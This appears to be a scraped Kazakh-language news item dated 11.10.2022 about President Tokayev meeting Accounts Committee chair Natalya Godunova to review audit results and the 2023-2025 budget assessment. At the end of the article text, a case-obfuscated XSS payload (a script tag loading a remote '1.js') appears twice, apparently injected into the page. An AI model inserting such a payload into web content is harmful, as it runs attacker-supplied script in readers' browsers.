Мемлекет басшысы Есеп комитетінің төрағасы Наталья Годунованы қабылдады Кездесу барысында Президентке Есеп комитетінің биылғы 9 айда атқарған жұмысы туралы есеп берілді. Осы кезеңде барлығы 3,4 триллион теңге бюджет қаражатын қамтитын 99 объектіде 17 аудиторлық тексеру жүргізілген. Наталья Годунова Қасым-Жомарт Тоқаевқа 2023-2025 жылдарға арналған республикалық бюджет жобасын бағалаудың негізгі нәтижелері туралы да мәлімет берді. Онда даму бюджетінің 3,5 триллион теңге қаржысы қамтылған. Сонымен қатар Мемлекет басшысына салық жеңілдіктерінің тиімділігіне жүргізілген аудиттің алдын ала қорытындылары ұсынылды. Кездесу қорытындысы бойынша Президент мемлекеттік аудит жүйесін одан әрі дамытуға қатысты бірқатар нақты тапсырма берді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.10.2022

https://ortcom.kz/kk/novosti/1665402716

Просмотров: 294


Пікір қосу



Деректерді қолтаңбаға қосу